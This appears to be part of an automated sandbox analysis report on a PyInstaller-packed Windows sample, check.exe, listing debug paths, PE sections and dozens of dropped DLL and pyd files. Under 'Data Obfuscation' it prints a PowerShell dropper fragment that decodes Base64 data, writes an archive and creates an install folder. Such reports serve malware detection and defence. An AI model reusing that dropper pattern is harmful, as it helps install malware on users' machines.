Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1610704745.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2238792749.00007FFB027E2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2254902034.00007FFB1E3C4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2254902034.00007FFB1E3C4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2238792749.00007FFB0287A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1591302099.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2253522169.00007FFB1D5B5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1605539019.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2253080891.00007FFB1D343000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2246454728.00007FFB0B447000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2246454728.00007FFB0B447000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2254003288.00007FFB1DE53000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2252607497.00007FFB1CA16000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1605718815.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000005.00000002.2255697240.00007FFB23A6B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1604956323.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2240383071.00007FFB02DB6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000005.00000002.2251272869.00007FFB1C813000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000005.00000002.2255697240.00007FFB23A6B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2232844342.00007FFB01C7A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2250838396.00007FFB1C519000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2228519197.00007FFB00F94000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1611120913.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000005.00000002.2218188859.000001FA7C2F0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1593302035.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2243716928.00007FFB03588000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2247223611.00007FFB0B4E5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1591113772.000001A2C2636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2250105454.00007FFB1C4EE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(${random_encoded_data});[System.IO.File]::WriteAllBytes(${random_archive_file},${random_decoded_bytes});${random_new_item}=New-Item -ItemType Directory -Path ${random_install_path};tr
Source: VCRUNTIME140.dll.4.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Source: MSVCP140.dll.4.drStatic PE information: section name: .didat
Source: Qt5Core.dll.4.drStatic PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.drStatic PE information: section name: _RDATA
Source: opengl32sw.dll.4.drStatic PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.4.drStatic PE information: section name: .qtmetad
Source: qgif.dll.4.drStatic PE information: section name: .qtmetad
Source: qicns.dll.4.drStatic PE information: section name: .qtmetad
Source: qico.dll.4.drStatic PE information: section name: .qtmetad
Source: qjpeg.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.4.drStatic PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.4.drStatic PE information: section name: .00cfg
Source: python313.dll.4.drStatic PE information: section name: PyRuntim
Source: qtga.dll.4.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.4.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.4.drStatic PE information: section name: .qtmetad
Source: qminimal.dll.4.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.4.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.drStatic PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
Source: MSVCP140.dll.6.drStatic PE information: section name: .didat
Source: Qt5Core.dll.6.drStatic PE information: section name: .qtmimed
Source: VCRUNTIME140.dll0.6.drStatic PE information: section name: _RDATA
Source: libcrypto-3.dll.6.drStatic PE information: section name: .00cfg
Source: opengl32sw.dll.6.drStatic PE information: section name: _RDATA
Source: libssl-3.dll.6.drStatic PE information: section name: .00cfg
Source: qtuiotouchplugin.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.6.drStatic PE information: section name: .qtmetad
Source: qgif.dll.6.drStatic PE information: section name: .qtmetad
Source: qicns.dll.6.drStatic PE information: section name: .qtmetad
Source: qico.dll.6.drStatic PE information: section name: .qtmetad
Source: python313.dll.6.drStatic PE information: section name: PyRuntim
Source: qjpeg.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.6.drStatic PE information: section name: .qtmetad
Source: qtga.dll.6.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.6.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.6.drStatic PE information: section name: .qtmetad
Source: qminimal.dll.6.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.6.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.6.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.drStatic PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.6.drStatic PE information: section name: .qtmetad
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeCode function: 14_2_00007FFAFDF1D5E4 push rbx; retn 0000h14_2_00007FFAFDF1D5F5
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44602\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI79922\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HseeHuht\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\HseeHuht\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
